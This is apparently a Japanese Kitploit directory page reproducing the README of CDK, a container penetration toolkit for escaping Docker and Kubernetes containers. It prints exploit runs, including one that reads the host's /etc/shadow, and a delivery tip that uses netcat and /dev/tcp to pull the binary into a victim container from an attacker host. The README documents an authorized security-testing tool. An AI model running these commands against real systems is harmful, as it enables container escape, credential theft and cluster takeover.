Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CDK — 📦 K8s、Docker、Containerdのセキュリティテストを簡単にします。 | Kitploit
ツール/GitHubGitHub/cdk-team/cdk
特権昇格偵察コンテナセキュリティ永続化メカニズムエクスプロイト横移動ポストエクスプロイトペネトレーションテストクラウドセキュリティコンテナエスケープコンテナエスケープ 第2位
4.7k606655ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubcdk-team/cdk

CDK

📦 K8s、Docker、Containerdのセキュリティテストを簡単にします。

リポジトリを見るウェブサイト

CDK - ゼロ依存コンテナペネトレーションツールキット

英語 | 简体中文

png

法的免責事項

事前の相互同意なしにCDKを使用してターゲットを攻撃することは違法です。CDKはセキュリティテスト目的のみに使用されます。

概要

CDKは、オープンソースのコンテナペネトレーションツールキットであり、OSに依存せずに様々なスリム化されたコンテナで安定したエクスプロイトを提供するように設計されています。便利なネットツールと多くの強力なPoC/EXPが付属しており、コンテナからの脱出やK8sクラスターの乗っ取りを容易にします。

クイックスタート

cdk eva を実行して評価情報と推奨エクスプロイトを取得し、次に cdk run を実行して攻撃を開始します。

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

インストール/配信

最新リリースを https://github.com/cdk-team/CDK/releases/ からダウンロードします。

実行可能ファイルをターゲットコンテナにドロップしてテストを開始します。

ヒント:実際のペネトレーションテストでCDKをターゲットコンテナに配信する

ファイルをアップロードできるエクスプロイトがある場合、CDKバイナリを直接アップロードできます。

RCEエクスプロイトがあるが、ターゲットコンテナに curl や wget がない場合、以下の方法でCDKを配信できます:

  1. まず、パブリックIPを持つホストにCDKバイナリをホストします。
(ホスト側)
nc -lvp 999 < cdk
  1. 被害コンテナ内で以下を実行します。
cat < /dev/tcp/(あなたのパブリックホストIP)/(ポート) > cdk
chmod a+x cdk

使用方法

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              コンテナ内部の情報を収集して脆弱性を発見します。
  cdk evaluate --full                       情報収集時にファイルスキャンを有効にします。

Exploit:
  cdk run --list                            利用可能なエクスプロイトをすべて表示します。
  cdk run <exploit> [<args>...]             単一のエクスプロイトを実行します。詳細は https://github.com/cdk-team/CDK/wiki を参照。

Tool:
  vi <file>                                 "vi" コマンドのようにコンテナ内のファイルを編集します。
  ps                                        "ps -ef" コマンドのようにプロセス情報を表示します。
  nc [options]                              TCP トンネルを作成します。
  ifconfig                                  ネットワーク情報を表示します。
  kcurl <path> (get|post) <uri> <data>      K8s api-server にリクエストを送信します。
  ectl <endpoint> get <key>                 ectd キーの不正列挙を行います。
  ucurl (get|post) <socket> <uri> <data>    Docker Unix ソケットにリクエストを送信します。
  probe <ip> <port> <parallel> <timeout-ms> TCP ポートスキャン、例: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     このヘルプメッセージを表示します。
  -v --version  バージョンを表示します。
  --profile=<name> 評価プロファイルを選択します。

機能

CDKには3つのモジュールがあります:

  1. Evaluate: コンテナ内部の情報を収集して潜在的な脆弱性を発見します。
  2. Exploit: コンテナ脱出、永続化、水平移動のための機能を提供します。
  3. Tool: TCP/HTTPリクエスト、トンネル、K8sクラスター管理のためのネットワークツールとAPIを提供します。

Evaluate モジュール

使い方

cdk evaluate [--full]
戦術スクリプトサポート使用法/例
情報収集OS基本情報✔link
情報収集利用可能なCapabilities✔link
情報収集利用可能なLinuxコマンド✔link
情報収集マウント✔link
情報収集ネット名前空間✔link
情報収集機密ENV✔link
情報収集機密プロセス✔link
情報収集機密ローカルファイル✔link
情報収集Kube-proxy Route Localnet(CVE-2020-8558)✔link
情報収集DNSベースのサービスディスカバリ✔link
発見K8s Api-server情報✔link
発見K8s Service-account情報✔link
発見クラウドプロバイダーメタデータAPI✔link

Exploit モジュール

利用可能なエクスプロイトをすべて表示:

cdk run --list

ターゲットを指定してエクスプロイトを実行:

cdk run <script-name> [options]
ツールをダウンロード